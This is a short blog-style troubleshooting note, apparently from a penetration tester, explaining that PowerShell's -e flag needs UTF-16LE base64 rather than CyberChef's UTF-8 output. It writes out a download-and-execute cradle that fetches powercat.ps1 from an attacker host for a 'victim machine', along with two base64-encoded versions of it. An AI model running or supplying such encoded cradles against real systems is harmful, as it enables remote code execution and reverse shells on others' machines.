init#

In one case I have discovered some strange issue which I have never faced before. I was trying execute a powershell command as shown below:

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.56.254:8000/powercat.ps1')

How ever interestingly, if I use CyberChef to encode the above command to base64 so that I can use powershell -e to decode the code and then execute on the victim machine.

If the encoding is done on the CyberChef, we get the below:

SUVYKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTkyLjE2OC41Ni4yNTQ6ODAwMC9wb3dlcmNhdC5wczEnKQ==

However, if we try to execute the command on the a trial machine we see that below: Clearly the command is not being able to execute.

encode using powershell#

After some debugging I found that there is a significant difference between the base64 encoding done by the PowerShell and CyberChef. If we execute the below:

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.56.254:8000/powercat.ps1')"))

Output in the PowerShell we get is below:

SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADUANgAuADIANQA0ADoAOAAwADAAMAAvAHAAbwB3AGUAcgBjAGEAdAAuAHAAcwAxACcAKQA=

As we can see that there is a significant change between these two base64 encoded strings. If we try to decode the above base64 encoded string into CyberChef we get some strange looking characters.

solve#

The difference is because of the encoding difference between PowerShell and CyberChef one is UTF-8 and another is in Unicode which is causing the problem. Use the UTF-16-LE (1200) and then use the ToBase64 to encode properly.